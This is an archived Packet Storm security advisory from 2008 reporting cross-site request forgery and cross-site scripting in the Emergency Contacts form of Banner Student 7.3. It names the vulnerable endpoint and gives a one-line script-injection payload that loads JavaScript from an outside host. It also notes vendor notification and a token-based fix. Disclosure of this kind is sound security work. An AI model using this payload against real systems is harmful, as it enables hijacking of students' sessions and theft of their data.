what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

bannerss-xsrfxss.txt

bannerss-xsrfxss.txt
Posted Jan 30, 2008
Authored by Brendan M. Hickey | Site bhickey.net

Banner Student version 7.3 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 8403560c03cb62052635309d6308a8bf34755c36ce3b19d7edbec472976bb8c2

bannerss-xsrfxss.txt

Change Mirror Download
http://ch4n.org/banner.txt

Application: Banner -- Student Services
Version: 7.3
Bug: Cross-site Request Forgery, cross site scripting
Exploitation: Remote, versus authenticated users
Discovery Date: August 21, 2007
Notification Date: August 22, 2007
Disclosure Date: January 29, 2008

Author: Brendan M. Hickey
Website: http://www.bhickey.net
http://www.ch4n.org

INTRODUCTION

"Banner is the world's most widely used collegiate administrative suite of
student, financial aid, finance, human resources, and advancement systems."
-- Sungard.com

"Banner Student fuses administrative and academic functions that make it
easy to manage data while giving prospects, learners (both traditional and
non-traditional), and faculty secure, 24x7, online access to the
information they need. Prospects can apply for admissions. Learners can
search and register for classes by term or date, and retrieve financial
aid data. Faculty can easily manage course information, rosters, and
grading, and advise students."

-- Banner Student product information
(http://www.sungardhe.com/Products/Product.aspx?id=1024)

University students interact with 'Banner Student Services' through a web
interface. Tasks are performed by making POST requests to fixed URLs.
A cross-site script attack facilitated by cross-site request forgery was
discovered in the "Emergency Contacts" section of the service.

BUG

A student may update her emergency contacts through a web form. Each form
field is checked for length, the longest accepting 30 characters, but not
content.
An attacker can inject arbitrary javascript code into an user's session by
luring authenticated Banner users to a website that makes a POST request
to the update contacts script.

The script necessary to update the emergency contacts is located at:
http://BANNERDOMAIN/ss/bwgkoemr.P_UpdateEmrgContacts

Setting the address field (add1) to

<script src=http://ch4n.org/s>

is necessary to include malicious javascript. Other form variables must be
set, this can be seen in the example code.

EXAMPLE CODE

http://ch4n.org/banner_code.txt

VENDOR NOTIFICATION

The vulnerability was disclosed to Sungard on August 22, 2007.

FIX

This vulnerability can be remedied by requiring a magic number to
accompany POST requests.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close